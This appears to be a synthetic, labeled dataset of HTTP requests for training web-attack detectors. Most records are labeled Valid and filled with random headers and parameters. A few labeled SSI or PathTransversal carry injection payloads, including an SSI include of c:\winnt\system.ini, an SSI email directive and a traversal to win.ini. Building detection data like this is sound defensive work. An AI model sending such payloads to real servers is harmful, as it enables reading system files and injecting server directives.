UA-CPU: x86
UA-Disp: 2533,0787,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 9061x3656
Via: 2.7 227.104.114.137:147
Transfer-Encoding: identity
Upgrade: zene/1.3, ui2/2.6, 6sbtj/0.2
Warning: 657 www.eWibEanz.tiff "iaEat" "Mon, 06 Jul 09 07:37:50 GMT"
X-Forwarded-For: 37.174.184.200
X-Serial-Number: 155066
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

v2JCjHfs4=b+teboot.ini?8o cmd&rdgonpd=29659307&VuiaaHw=s8aiI&RGPmxK6f.=ew&LheiJjalelejx=ivty&zhxnpsevAa93n=air&nrvd=421385648&RO4zselectS2f9_m=h2g&nullscriptMiYacceptpc0b1=gyprocessing-instructionwnui;3

End - Id: 34076
Start - Id: 9988
class: Valid
GET /ealtjsefetste2b/Ipt/adWhPqidpy-7J/eetehtfex/9mjdI4uLxT/n4aatysweh7Lerqistu/e1/tAykxCQz9nX/eu/nk942Er0b6wmss/yltesol13v.shtml?oae34eratc0E=2ydi&9echoLetcxGdf=nth9&_m-oRq82b=mQtcoFbZvgoK&7cUip=9381591 HTTP/1.1
Host: 41.214.239.12
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.2, compress;q=0.5, gzip;q=0.3, gzip;q=0.4
Accept-Language: otyraata-ooqlu;q=0.3, xaa-eela;q=0.4, Coxb-a;q=0.3, ithajxa-ia;q=0.1, of0-ias7en9;q=0.9
Cache-Control: min-fresh=899
Client-ip: 41.19.16.178
Cookie: nNzxawe5l=ui;GKl00MG=7b2ypfism4wt;crHnrtbi=?aie/rd gdso;ylielO=sXy0@9jV
Cookie2: $Version="25"
Date: Sat, 09 Jan 10 07:44:34 UTC
ETag: W/"Xm_AbeCBSRCOVhv_Iyj2"
Expect: hfta3e
From: wsO7end1@rfmr.fr
If-Modified-Since: Mon, 31 Dec 07 06:49:46 GMT
If-Unmodified-Since: Wed, 18 Apr 07 18:23:37 GMT
If-Match: *
If-None-Match: "XIhqkhp18lo.6pbu"
If-Range: Tue, 26 May 09 09:19:57 CET
Max-Forwards: 9
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: adE2 tucxsisy=rg2o
Authorization: Basic ZGhsMjk3cDpiZzBjMg==
Range: 7-,1-2,575-73
Referer: /3anaii/io4lq7o/nsu3eao/Tasb6Sn.jpg
TE: gzip;q=0.2,gzip;q=0.5
Trailer: Max-Forwards
User-Agent: amuerdefdt (sSI4koAJv; dKo-5Xxn-)
UA-CPU: MIPS
UA-Disp: 0205,052,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6267x971
Via: HTTP/3.6 www.lInankUy.jpg, eeidm/4.5 253.100.33.86, ihele5/8.9 www.es8tugiw.htm:189
Transfer-Encoding: compress
Upgrade: b2bhql/3.8
Warning: 190 96.212.144.39 "6eoaBieotasga" 
X-Forwarded-For: 48.85.205.201
X-Serial-Number: 7198158285326670
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9988
Start - Id: 39230
class: SSI
GET /thacsmOiyeNmnKba0ro.css?ul4W=%409aon3adte5Ay&a74nopocosiy=%3C%21--%23email+fromhost%3D%22www.ramead.com%22+tohost%3D%22mailbox.qazt.com%22+message%3D%22hofe+E0abnr+GnnjIsfF+A9eF%22+fromaddress%3D%221qnnnt.com%22+toaddress%3D%22baS.dya.com%22+subject%3D%22heh%22+sender%3D%22erh.com%22+replyto%3D%22sibrsao.com%22+cc%3D%22lsb%22+inreplyto%3D%22adm+ieon+iner%22+id%3D%22ctmail%22+--%3E HTTP/1.0
Host: 228.230.23.42
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: identity
Accept-Language: zwoo-Ies5xfh;q=0.9, ur-Eli5o, ymi-lb;q=0.9, S8tCe-o
Cache-Control: only-if-cached
Client-ip: 115.187.210.122
Cookie: aspaqs7lOloevmo=qre7estat;aiJ11=3Q_O@fZ
Cookie2: $Version="798"
Date: Mon, 26 Apr 04 19:27:12 GMT
ETag: W/"SEciDHf1YaSpWifciL1"
Expect: 100-continue
From: lyrtrai@3atnetodh4.net
If-Modified-Since: Mon, 05 Jan 04 07:09:00 CET
If-Unmodified-Since: Sat, 04 Oct 08 18:51:21 CET
If-Match: *
If-None-Match: *
If-Range: "6-4buPdj1OH4uxYKc-"
Max-Forwards: 1
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c2ltMjpzYWdlYjVhYQ==
Authorization: tnehsR oeivpo=oehots
Range: 5-9725,-6683
Referer: http://www.mfore.de/aeeroRa/od3u.exe
TE: trailers,gzip;q=0.2,deflate;q=0.3
Trailer: If-None-Match
User-Agent: rbS5_Y@ http://www.umtsI.org
UA-CPU: 68000
UA-Disp: 274,6270,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 833x510
Via: HTTP/7.4 167.72.115.253
Transfer-Encoding: compress
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 173 103.13.38.123 "ncwbefh" "Tue, 25 Oct 05 02:27:19 UTC"
X-Forwarded-For: 252.9.253.184
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 39230
Start - Id: 32182
class: Valid
GET /gnejrs.jpeg?wsctiPmdt8smT3=n_hTa3&ttbtzaeu1swsrl=54617041&ie4spentih5=suf&zw3rromhs6EN3ni=dsMAeMoqj7i HTTP/1.0
Host: 109.252.54.62
Connection: close
Accept: audio/*, image/*;q=0.1, video/quicktime
Accept-Charset: *
Accept-Encoding: deflate;q=0.8, gzip, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 229.187.109.31
Cookie: uguoverTatrbrhe=4n;ssupiv=uAe4olodgT;igsntewjc6nc=Tde;mEt=2405901350
Cookie2: $Version="54"
Date: Fri, 01 Feb 08 16:59:43 UTC
ETag: W/"1okxnce69WdrEIIq"
Expect: 100-continue
From: caui@Dve3us.st
If-Modified-Since: Wed, 14 Feb 07 23:57:03 UTC
If-Unmodified-Since: Tue, 26 Feb 08 09:41:05 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 8.5
Pragma: lelyds='oiau'
Proxy-Authorization: werm rnqahTl=Rnzd2
Authorization: Basic ZmV5b3JlSTphOWVpYTlu
Range: -31011,02795-
Referer: http://www.unga.uk/tdt6bi/amrei/aftclceh/ttwtaied/hca2ayie.mpg
TE: trailers
Trailer: Expect
User-Agent: pelp/7.0.0.5
UA-CPU: Sparc
UA-Disp: 8263,026,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 320x815
Via: FTP/0.1 149.199.223.154, FTP/7.9 www.tooet.html, FTP/8.8 33.86.84.101
Transfer-Encoding: deflate
Upgrade: arx0t/5.9, nloymn/5.4
Warning: 615 www.thrrdM.js:0143 "obNj" 
X-Forwarded-For: 71.26.127.147
X-Serial-Number: 99968202
----: ----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 32182
Start - Id: 24597
class: Valid
GET /ep2gKR-RefQwIaD/i8-l/cpq03entynkcaOke/ezkunaricjth/e@TgTta.m3ll0/iRs0itobcxhe/tdO/BlzoeIT@bBlh/a2cGG/teLIh/soxbqflyetde5.htm?8div2-mu=nbelacgtnQ&seeesnfucgc=r&tseOeE=+ana7be+ddf%3Dnes&ohuda54tlr=tW3H9pMxNq2m&AOKAaccess_log=%7E%3Diaartlg%3Ar%5Dwi%7Cm&2gZ6-UMClogu=2+eelnd&cnottstqybe4e=anehtaccesdin6rmrcpCy&EtdNq1sv8lammj=aenaob7&lipcaky=57652825&yy5urrfwacHo=ot8h+tr&7vx5AG96U9Or=l8iyUmA&FAlb@=6721287097&adminQbpR-=4YXpVG2&DqioyTotlf9uls=trdgrpdc&ijsh2estn=mmUrYaelTrh HTTP/1.1
Host: 199.193.230.148:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, compress, deflate;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 144.153.248.99
Cookie: 2i8zwget@u_=32469374;meR2untedtssc=7841
Cookie2: $Version="0"
Date: Sun, 17 May 09 24:49:13 GMT
ETag: W/"4dS.u20O0Z3P8h."
Expect: 100-continue
From: naao@dsGtaOrc0.net
If-Modified-Since: Thu, 15 Jan 04 07:48:21 GMT
If-Unmodified-Since: Wed, 29 Mar 06 21:50:59 UTC
If-Match: *
If-None-Match: "MN6Z1kcVdo4O2KoRV3Vz"
If-Range: "tsmZj5mWAtrO58C"
Max-Forwards: 45
MIME-Version: 8.0
Pragma: c8zI5='in3en'
Proxy-Authorization: Basic ZWhUTzpqaFF0bGQ=
Authorization: Digest qop=auth
Range: 5150-,581355-
Referer: /aabsihuT/ynamo/dtuwsXsm/inSai9S.mpeg
TE: deflate;q=0.7,trailers,gzip;q=0.1
Trailer: If-Modified-Since
User-Agent: Mozilla/5.6 (Windows; U; Win98 6.9; es-iL; rv:7.8.1) Gecko/70922131
UA-CPU: StrongARM
UA-Disp: 678,816,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 587x9500
Via: 2.9 www.gGdEjLh8.gif
Transfer-Encoding: nee3rt; s96e1=rOdrea
Upgrade: FNHpie/1.6, stqE/9.5, mlak/3.1
Warning: 152 www.ooridO.gif "UeeEwtsltb3wwa8sst8o" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 04810456
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24597
Start - Id: 4239
class: Valid
PUT /taaeo1oe7Tawryek/o-0pXMSen/ztlgceeon/wJ1TWt7Y.rK86/qxxmlqLk@cn/ta1udAatc1ifie5/9F3qhid0D@EEqXD/yj/o7ARS.shtml? HTTP/1.1
Content-Length: 286
Content-Language: aatnNsa
Content-Encoding: gzip
Content-Location: /rrtas.jpg
Content-MD5: SWx5bmhuRmZtYm91ZHJpMg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Feb 04 20:29:39 GMT
Last-Modified: Thu, 16 Nov 06 18:45:08 GMT
Host: www.0sqybnd.be:698
Connection: close
Accept: */*
Accept-Charset: windows-1250;q=0.5
Accept-Encoding: *;q=0.5
Accept-Language: hh-5;q=0.2, a-ne;q=0.8, weyo-o;q=0.4
Cache-Control: only-if-cached
Client-ip: 206.62.220.37
Cookie: aoMheufp9t=Osniwindow.openerzpiac-;_n@wostdinM=rlYe 
Cookie2: $Version="571"
Date: Sun, 03 Oct 04 02:42:04 GMT
ETag: "dAzQsYVf9kp3HLIs52i"
Expect: 100-continue
From: arytbst@rawnwnael.com
If-Modified-Since: Tue, 29 Sep 09 20:31:05 UTC
If-Unmodified-Since: Mon, 26 Apr 04 21:59:08 UTC
If-Match: "HJq9SUTgrkINGL30E9Pp"
If-None-Match: "o1Ik51VsFDmozW@2CD"
If-Range: "TW0Ohb.lN2pYCKL3@"
Max-Forwards: 00
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: ini5 andat=olio
Authorization: Digest nc=6E71ba2e
Range: 936255-,7-,-5
Referer: http://Harsel.cz/tttlYha/euzwo/eeftok1.gif
TE: trailers
Trailer: Accept
User-Agent: mt3snwR3 http://www.i8fqa.org
UA-CPU: x86
UA-Disp: 9117,635,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4623x593
Via: 2.0 152.151.130.130, ycz2/8.5 222.167.14.99
Transfer-Encoding: compress
Upgrade: 5ck/7.3
Warning: 344 www.s3tCkSq.css "tonieta9" "Mon, 02 Feb 09 17:14:30 UTC"
X-Forwarded-For: 240.213.181.129
X-Serial-Number: 3720829433622
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

q-0a@nHqreplace=22619746&kTkeAooeeiDt5=hpsaeNjtnio&2QCz=oxeevd&lEanea=qBXD-6&egk=3nftoh3nke&sl7sseeq=sccannecTahwE1peih&epmx=stzhknstetnyfva&iw=38396108&rtneoetriitrt=n0@et58GZr0&Le7earfcOu=Hmgsldudrigaimtv&5rgzsm=jdd6I\tmt&gmhagsIaYnatooe=8317550541&lH=e4Hcuegyamrmt&KIZrMQt=tio\

End - Id: 4239
Start - Id: 36004
class: PathTransversal
PUT /hdamsRWWO/kcGaq1ViMe/mub29Nn-AB0Wxf3v/.JL3ckd/giiunteadielntltpr/4wrfynqexec5i/NYgjcopyGJ57Vm/qERpGwIe0nCXfDRWzj/toeorxu3otnAsdinan.php4? HTTP/1.0
Content-Length: 179
Content-Language: lenlb,cr,H7eahiwo
Content-Encoding: gzip
Content-Location: /sdrTr/rEwk.gz
Content-MD5: c3Nob2xseG5uc2FycmhyYw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Oct 09 10:51:53 UTC
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: 188.148.218.229:68927
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: oEeeowza-aer, nanuESyu-I0, e-lmts, Czv-94, gaxgT-rlttid
Cache-Control: no-transform
Client-ip: 241.137.194.133
Cookie: ee3tn9s6smte8=dn8vtRbmtotah;ifnedhhotljgr=tossxilcrefn
Cookie2: $Version="232"
Date: Wed, 01 Aug 07 06:13:21 UTC
ETag: W/"WcuTKJ-E0lIjdULM"
Expect: ueoc69
From: rA7tR@tqia61e.ch
If-Modified-Since: Sun, 05 Dec 04 18:23:33 UTC
If-Unmodified-Since: Mon, 19 Jun 06 20:40:34 GMT
If-Match: "g3hSHF7eEkHdVD8"
If-None-Match: *
If-Range: Mon, 10 Dec 07 22:40:25 GMT
Max-Forwards: 5
MIME-Version: 5.1
Pragma: d6x='n5'
Proxy-Authorization: NTLM YXRlb2F1ZHJFMWhvaWVlbHJzTHRYZWU3MWRkb29nb3Q=
Authorization: Digest response="b001AD8663ac586b9BBEABDeE3bAF9ed"
Range: -22147
Referer: http://Seom8ol.ch/aehi0irL.cfm
TE: trailers,gzip,chunked
Trailer: Accept
User-Agent: efkWyPuMH http://www.aopticp.de
UA-CPU: 68000
UA-Disp: 2185,9932,16
UA-OS: Win98
UA-Pixels: 551x993
Via: HTTP/6.7 www.aihiym.gif, nis9/2.3 140.29.51.181, FTP/0.6 180.25.204.39
Transfer-Encoding: whronr
Upgrade: 4tnu/7.8, odsAo/4.6, iuf/3.2
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 88.215.245.58
~~~~~: ~~~~~~~~~~

oyR=%29oVi2z%24e%3Bird+%26&sn9elR5osern1Eo=8085728799&0zHXhttpsEidxtermf%uz1=e%3A%5C%5CWINNT%5C%5Cwin.ini&seh15=bd&trokrernnuf=5iae0nelirlrtneay&n8oeixtersn=16008&theabo=n3rqwp-aT

End - Id: 36004
Start - Id: 6735
class: Valid
PUT /4MXaMqPi/0a06DJ4shutdownZHFJlib.php3? HTTP/1.1
Content-Length: 21
Content-Language: 09d72U,tetabe,1ofe
Content-Encoding: deflate
Content-Location: http://www.vtlskckr.st/ifqneet/mIhunwn/brisskar/mldE.tiff
Content-MD5: NW5zYmVxemJjaXJjYzZlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 May 09 16:27:25 GMT
Last-Modified: Wed, 25 Feb 09 07:37:48 CET
Host: www.wnnda.net:80
Connection: keep-alive
Accept: text/*;q=0.0, audio/basic, image/jpeg
Accept-Charset: x-mac-arabic;q=0.5, x-mac-arabic;q=0.8, isiri-3342;q=0.5, iso-8859-7;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: omo-fo;q=0.9, iwLp-gbs, 6gBmee-1;q=0.0
Cache-Control: et='bel'
Client-ip: 41.192.165.109
Cookie: .TwgetAnqEdvzR1=rbtiieevtmp;tstkihcyts=2+b 
Cookie2: $Version="8"
Date: Thu, 09 Jun 05 06:32:37 UTC
ETag: W/"47QAu0uB2I2rgLYT56rI"
Expect: 100-continue
From: yhiii@asou.ch
If-Modified-Since: Fri, 22 Apr 05 09:41:43 CET
If-Unmodified-Since: Thu, 28 Apr 05 24:37:13 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 18 Feb 09 22:03:21 GMT
Max-Forwards: 3
MIME-Version: 7.6
Pragma: oome=eifng
Proxy-Authorization: NTLM aWV1aWtvMGJsZmkxdWVpbGNkbnNzZHhwaGRydHFyaHJzbmNlb2FuaW5qSHJoYXI=
Authorization: NTLM cm5lZGdlc29BSXNsaXQ1ZTFybnJuVFJpQnRMZXRyYWU=
Range: -857816
Referer: http://dioar.net/oObir6.asmx
TE: deflate;q=0.0,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/3.3 (Windows; U; Win98 2.2; it-oy; rv:3.3.9) Gecko/57332790
UA-CPU: Sparc
UA-Disp: 053,477,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 133x848
Via: 7.6 244.14.164.123
Transfer-Encoding: deflate
Upgrade: uEWpe7/8.0, areh/1.5, 0udeep/0.1
Warning: 366 171.36.127.196 "totegellhyswl3loi" 
X-Forwarded-For: 6.218.56.206
X-Serial-Number: 0215264637366024
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~

s5qoEt0teaenx=wqtrdsr

End - Id: 6735
Start - Id: 2032
class: Valid
GET /eert/5m/pd/nmNIHU0xL-P-aCh4/dietiopNr2/as0lMXLaHkFrCF1X/uiu/y8y0ayseea/or5-WAz/ioorsehajhdnctjapr.htm?c0lgils8IfyiaA0=loEosseee&dbuyoSxuUi=h%3Etrbeswgetrm7h4S&hoDiybunsYhssj=18&sejannbneoou=ur&_8dGS=fwt6hgi12n&0FnKhjKyT=p0t4a&qdllwa0n=fkZC&englfnnudoTca=asr HTTP/1.1
Host: www.cweaehoib.ch
Connection: RyDnM
Accept: image/jpeg, application/*;q=0.0, text/*;q=0.5
Accept-Charset: x-mac-hebrew;q=0.5, us-ascii, iso-2022-jp, iso-8859-15, iso-8859-1;q=0.8
Accept-Encoding: compress;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 160.114.220.230
Cookie: uTiea=7;lG7woTlr56po9=lx lc;inhvleBhft7orz=ec;sisx=8etgrlietmes9;eptopefnendc=s5toe4
Cookie2: $Version="1"
Date: Fri, 12 Oct 07 17:56:16 CET
ETag: W/"BJ39dv0jCe4eK1pIRk2L"
Expect: 100-continue
From: lasmg@tytlcyu.de
If-Modified-Since: Sun, 09 Apr 06 23:29:28 GMT
If-Unmodified-Since: Mon, 18 May 09 03:17:43 GMT
If-Match: "q4kGZR7JyhDhBNPja4."
If-None-Match: *
If-Range: Mon, 07 Apr 08 05:57:39 GMT
Max-Forwards: 84
MIME-Version: 1.2
Pragma: e5yoao='yehn'
Proxy-Authorization: hn5ri hitrai8=tiph1etc
Authorization: NTLM eXR0ZGFpZnJGZWlEQ2RlMGU3amhuZW9paXd0bHBsZWZseWZubnVRdm5tV0llaA==
Range: 705982-,79-08776,-104383
Referer: http://www.dnlhasoy.uk/aadp/ao8yggg/l2iqd9gz/epec.css
TE: deflate;q=0.6,gzip;q=0.6
Trailer: Upgrade
User-Agent: Mozilla/8.2 (Windows; U; WinNT 4.6; ir-Gc; rv:5.6.6) Gecko/69397839
UA-CPU: StrongARM
UA-Disp: 5129,6449,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8738x825
Via: HTTP/7.5 www.hykvatri.tiff:9, HTTP/2.3 www.1oLbv.htm, FTP/8.3 www.Jlaa37t.png
Transfer-Encoding: identity
Upgrade: nto/7.5, snsa/8.2, 8hnEe/0.3
Warning: 120 www.fagzsE.shtml "4pyaat" 
X-Forwarded-For: 129.8.72.4
X-Serial-Number: 867919664733531
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2032
Start - Id: 40582
class: SSI
GET /cKB7m/tNdo/t2YE@/dWmYafoX/byYCTTp8WLc/hrffWMST6N/CAkbD7Uv/eo-if/gySQx/uV@v6/@JE/shee2cueha3s.jsp?veEt=5&Vd@elLzZTAa=%3C%21--++%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++--%3E HTTP/1.1
Host: 44.129.108.57:80
Connection: keep-alive
Accept: text/*;q=0.3, video/*;q=0.2
Accept-Charset: x-mac-chinesetrad, euc-jp;q=0.3, windows-1257, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 58.12.242.231
Cookie: Oihdsue=irm;nhiE=i3en
Cookie2: $Version="5"
Date: Sun, 10 Apr 05 05:31:40 CET
ETag: W/"zTQC3.87LXl7-H06oh"
Expect: dunnoepn=f5es
From: ws8c3i@tat8.st
If-Modified-Since: Mon, 20 Dec 04 11:15:20 CET
If-Unmodified-Since: Fri, 09 May 08 16:31:42 UTC
If-Match: "AH9cgLvPPD55Ldlf"
If-None-Match: *
If-Range: *
Max-Forwards: 4583
MIME-Version: 1.6
Pragma: ai=afohoipt
Proxy-Authorization: NTLM eXNIb3R0ZWE5enRuYWlucm5JNWFldGxFYTNxYXJtNm9ubm90
Authorization: oohiae ethn2=e7oeT4j
Range: 437-
Referer: http://sseer.gov/a1ash2mt/5domqsa.conf
TE: deflate;q=0.8
Trailer: If-None-Match
User-Agent: ldefls2sa/2.8.6.8.2
UA-CPU: PowerPC
UA-Disp: 563,477,16
UA-OS: Windows 98
UA-Pixels: 8517x087
Via: HTTP/1.6 118.151.109.145, 6.7 www.d0ta.png:0736, FTP/1.4 www.uzou.png
Transfer-Encoding: gzip
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 835 www.trhpd.htm "psE9Ldemvcians32" "Sun, 26 Nov 06 20:41:29 UTC"
X-Forwarded-For: 169.156.207.121
X-Serial-Number: 69115
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 40582
Start - Id: 32100
class: Valid
GET /l0XVJKti5wxYFML/pl4traolep/aslbsiir/tzdortpcrtptlnet/srn7idahg7iti5byStet/4c/lJhJr5KnUm/emctrs.cgi?iefnn5n=2299558291&n6d=rO&.ZERsb=fiitaan&jUddbeaoqihotl=ee%40&erkevhte=%5Dil%3Bym8cNeLisi&nnscaCebied=u%40%40n2C_FN HTTP/1.0
Host: www.etcR3tyac.cz
Connection: fyLt
Accept: image/*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: ssfno2c=nbtn1ks
Client-ip: 158.27.187.9
Cookie: eemt=o;a1Etuiv=402749;Erwsn5adqd=aeqaeu
Cookie2: $Version="102"
Date: Fri, 25 Jul 08 07:07:49 GMT
ETag: "D_Ls_R7aeBy36JCM7s"
Expect: znnrtj=5seob7w;erlhsae=uifl
From: snopaa@pattnfyrl.org
If-Modified-Since: Mon, 15 May 06 21:19:55 UTC
If-Unmodified-Since: Fri, 29 May 09 15:04:30 UTC
If-Match: "jc1HMkTAmlO-UGIew"
If-None-Match: *
If-Range: *
Max-Forwards: 6493
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic ZXNvbHRybzphRk9p
Authorization: Digest realm
Range: 130281-,-02625
Referer: /jsIef/ngnt/seaoon6.png
TE: chunked,gzip,gzip
Trailer: If-Match
User-Agent: Mozilla/6.6 (Windows; U; Win98 1.0; Xm-be; rv:9.6.8) Gecko/36460226
UA-CPU: 68000
UA-Disp: 3488,5746,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 367x7496
Via: HTTP/3.1 www.8ieaxi4.html
Transfer-Encoding: odh8; 5enoa17=oeue
Upgrade: ipadO/5.2, lbr/9.1, 5Dq/1.2, al1/0.6, aCann/7.0
Warning: 904 243.231.55.119 "ogsigutei2fytsRtea0e" "Wed, 09 Feb 05 05:13:25 UTC"
X-Forwarded-For: 111.76.107.196
X-Serial-Number: 4047270
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32100
Start - Id: 18316
class: Valid
GET /t4dWCjVAlHU1lbPbkSN/d4si/t1C6kZVJ4KK7KJKThSF/pe6eBwiwinaid/eahyoes9h/eoIo_/yGU4XVs4RG/ao/n2VL/3ac1gpjxaU9/rbIEju5PXFwGjJyWA.jpeg?nullwp-cDSvbscriptcinput=548248&etogtVas=upxm&oogaa=snf9Uloo&r2=y%24l&iacyiete4oN2=s%3CRna&srceui=e&7e4dSIJGs=Iahpde&.9pc=ei8no&da=06&a2n5scns=gtEt4aa3zgMtah2eai&-8lOnaccess_log@=1ld%2Bne8%3E&nizoxfi9e=t%3A%40%2Bo8&bhoreW3=1&WWo8te2al=53 HTTP/1.0
Host: 52.169.3.146:3
Connection: keep-alive
Accept: video/*;q=0.7, application/*, text/plain;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=1170
Client-ip: 133.182.229.93
Cookie: TN35kQl=n3'fo
Cookie2: $Version="4"
Date: Tue, 09 Dec 08 06:54:27 CET
ETag: "uhksSzdVKdXbiQ9ZQ"
Expect: rvsav2=sltuna;ndynn
From: dnouclte@Kesusuhhls.de
If-Modified-Since: Tue, 24 Feb 04 06:53:52 CET
If-Unmodified-Since: Wed, 03 May 06 07:42:49 GMT
If-Match: "CGRyCk5Lin0OA6Fsi"
If-None-Match: "8Q1SUYCtSVsX7n4JQmx"
If-Range: Fri, 20 Mar 09 21:20:32 GMT
Max-Forwards: 3
MIME-Version: 6.5
Pragma: epst='r3'
Proxy-Authorization: NTLM dWVhM3Joc3d4YXJ0YW9udVNhdEx4aWVtZWhkYWFoYXRhYmFpTA==
Authorization: Basic ZmVtYWw6aWNjdQ==
Range: 33-392,-2077,7-8592
Referer: /atmeds/oderaesb/JHisEn.jpg
TE: chunked;q=0.1,trailers
Trailer: Authorization
User-Agent: kC3hsewoi1Rezsai
UA-CPU: x86
UA-Disp: 967,4917,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0744x394
Via: HTTP/6.4 www.hnosieW.jpg
Transfer-Encoding: 8rctea; tew2T=ie4oT
Upgrade: geO/3.5
Warning: 253 24.0.106.147 "r6nyEsuNdiuaaAlcTsi" "Sat, 27 Mar 04 01:27:38 CET"
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 31774201
----: ------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 18316
Start - Id: 8464
class: Valid
GET /ad7.tiff?bRvuJ=nnehrieEigfnno&re6ovameRia=rl38HRuLEw&6C6ehh6teo=1359873&mu7h=eEWRG&j0U1tFm9HP0d=gaiEeiarla HTTP/1.1
Host: www.olirntoh.ch:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.4
Cache-Control: min-fresh=1832
Client-ip: 80.15.106.68
Cookie: whereKz62h3tT=ihe8q;esghtr=ind'passwd3fvs
Cookie2: $Version="52"
Date: Sun, 22 Apr 07 23:27:49 UTC
ETag: W/"xBUPDdRe@TMYU4H"
Expect: 100-continue
From: lraeI@n6eai.de
If-Modified-Since: Thu, 23 Jun 05 17:02:18 UTC
If-Unmodified-Since: Thu, 30 Oct 08 17:35:13 CET
If-Match: *
If-None-Match: "XUB7CUd@3jZNUGlpX"
If-Range: "vP5AZPuAp2NYMvN5Q6R"
Max-Forwards: 583
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: rahe cmte4Hz=rntcz1cz
Authorization: Digest nonce
Range: 7593-23,41-590
Referer: http://butsM9s.net/sUpaeri/wtmlc3n.wmn
TE: trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: nUn7jgn (r.4_pzE@m; eur-uKDf7; i@xVma; ef2XEnU; rljLJZ)
UA-CPU: Sparc
UA-Disp: 1917,3085,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 963x121
Via: FTP/5.9 www.Ocigg.css, HTTP/7.9 www.hemsf.shtml
Transfer-Encoding: deflate
Upgrade: att6/5.9, lascr4/0.2, dko/7.4, ujer/7.0, 6vnnaz/2.3
Warning: 961 www.ntijm.html "estseteardr" "Thu, 20 Mar 08 23:35:03 CET"
X-Forwarded-For: 240.48.106.176
X-Serial-Number: 3858691762
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8464
Start - Id: 27209
class: Valid
GET /e-StL@XZgPX1VX/c3dEGUQoR/t420das3U_yN.CMy/4eas4ee/nZ691H5t-pSMgTjfPu/3wH1llrmz/o3OC/mdPo/access_loguAXdPbC.asp?ohfenrrbihnonai=toATmd28majt&dsmenPeahiu=25545254&a1de=2632924&cna=qdwsi&iknerdznC=957&qbylc8oagaeu=%26&on=hasnoqasetlida8u&ot=sDih&Ahrrcenoxue=ntelnet HTTP/1.0
Host: www.zbth6ocd.st
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 34.165.251.139
Cookie: aueoM=child%s;zs6r=r9etermstyldoe;tx58tcqpha=sxe
Cookie2: $Version="883"
Date: Wed, 05 Jul 06 22:59:06 GMT
ETag: "NriwVJRz19Tw3xXD-l0a"
Expect: sUpI=shahsoEh;teth0f1o=nebdm4
From: nseo2sh@tNat6ef8to.be
If-Modified-Since: Sat, 23 Oct 04 23:26:54 GMT
If-Unmodified-Since: Wed, 29 Dec 04 17:03:55 UTC
If-Match: "Dz6ZuXVOPACPcc.85"
If-None-Match: *
If-Range: *
Max-Forwards: 3659
MIME-Version: 2.5
Pragma: no-cache
